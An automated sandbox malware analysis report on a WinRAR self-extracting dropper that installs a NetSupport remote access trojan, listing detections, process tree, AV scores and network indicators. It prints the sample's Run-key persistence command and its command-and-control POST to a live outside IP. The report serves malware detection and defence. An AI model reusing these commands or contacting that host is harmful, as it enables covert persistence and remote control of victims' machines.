
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1556890
MD5: 166d71e145b2c802acd2b0a07e070bad
SHA1: 1c84d2e573e7096040fbe6e950fbff764aa11096
SHA256: 33b22fce68d5d7bd08e86b8506c50bdfcd38c26db5983864e8d33bdf62f53272
Tags: exeuser-Bitsight

Detection

NetSupport RAT
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • file.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 166D71E145B2C802ACD2B0A07E070BAD)
    • cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7672 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • bild.exe (PID: 7688 cmdline: C:\Users\Public\Public\Videos\Video\bild.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7892 cmdline: "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 8168 cmdline: "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup
No configs have been found
Source: C:\Users\Public\Public\Videos\Video\pcicapi.dll | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: C:\Users\Public\Public\Videos\Video\PCICHEK.DLL | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
(2 further entries not shown)

Source: 00000009.00000002.1915079530.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: 00000009.00000000.1914004958.0000000000822000.00000002.00000001.01000000.00000009.sdmp | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
(23 further entries not shown)

Source: 5.2.bild.exe.820000.0.unpack | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: 5.0.bild.exe.820000.0.unpack | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: 4.0.bild.exe.820000.0.unpack | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: 9.0.bild.exe.820000.0.unpack | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
Source: 4.2.bild.exe.6d100000.6.unpack | Rule: JoeSecurity_NetSupport | Description: Yara detected NetSupport remote tool | Author: Joe Security
(22 further entries not shown)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Public\Videos\Video\bild.exe, CommandLine: C:\Users\Public\Public\Videos\Video\bild.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Public\Videos\Video\bild.exe, NewProcessName: C:\Users\Public\Public\Videos\Video\bild.exe, OriginalFileName: C:\Users\Public\Public\Videos\Video\bild.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Public\Videos\Video\bild.exe, ProcessId: 7688, ProcessName: bild.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Public\Videos\Video\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7672, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 45.61.128.74, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Public\Videos\Video\bild.exe, Initiated: true, ProcessId: 7688, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Public\Videos\Video\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7672, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7616, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", ProcessId: 7672, ProcessName: reg.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7616, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", ProcessId: 7672, ProcessName: reg.exe

Timestamp: 2024-11-16T12:53:12.437468+0100 | SID: 2827745 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.4 | Source Port: 49730 | Destination IP: 45.61.128.74 | Destination Port: 443 | Protocol: TCP


AV Detection

Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL | Virustotal: Detection: 16%
Source: C:\Users\Public\Public\Videos\Video\bild.exe | ReversingLabs: Detection: 28%
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Virustotal: Detection: 49%
Source: C:\Users\Public\Public\Videos\Video\remcmdstub.exe | ReversingLabs: Detection: 13%
Source: file.exe | ReversingLabs: Detection: 50%
Source: file.exe | Virustotal: Detection: 51%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 93.5% probability
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,4_2_110AD570
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,5_2_110AD570
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\Public\Public\Videos\Video\msvcr100.dll
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: file.exe
Source: Binary string: msvcr100.i386.pdb | source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000004.00000002.3582942113.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, bild.exe, 00000005.00000002.1835584954.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.1916341976.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb | source: bild.exe, 00000004.00000002.3583091798.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, bild.exe, 00000005.00000002.1835772057.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.1916559157.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, PCICHEK.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb | source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN | source: PCICHEK.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL | source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb | source: bild.exe, 00000004.00000000.1735527672.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1832877239.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000002.1834377646.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.1914004958.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.1914967107.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb | source: TCCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb | source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb | source: bild.exe, 00000004.00000002.3583184483.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000005.00000002.1835885776.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.1916704363.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, pcicapi.dll.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP | source: TCCTL32.DLL.0.dr
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0040A273
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0041A537
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D330
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_11065890
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106A0A0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111266E0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110AFD0

Networking

Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49730 -> 45.61.128.74:443
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 104.26.0.231
Source: Joe Sandbox View | ASN Name: M247GB
Source: unknown | TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown | TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown | TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: geo.netsupportsoftware.com
Source: unknown | HTTP traffic detected: POST http://45.61.128.74/fakeurl.htm HTTP/1.1 | User-Agent: NetSupport Manager/1.3 | Content-Type: application/x-www-form-urlencoded | Content-Length: 22 | Host: 45.61.128.74 | Connection: Keep-Alive | Body: CMD=POLLINFO=1ACK=1
Source: bild.exe, bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | String found in binary or memory: http://%s/fakeurl.htm
Source: bild.exe, bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | String found in binary or memory: http://%s/testpage.htm
Source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: bild.exe, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://127.0.0.1
Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: bild.exe, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: bild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspP
Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: bild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspb
Source: bild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspx
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://s2.symcb.com0
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://sv.symcd.com0&
Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://www.pci.co.uk/support
Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://www.symauth.com/cps0(
Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | String found in binary or memory: http://www.symauth.com/rpa00
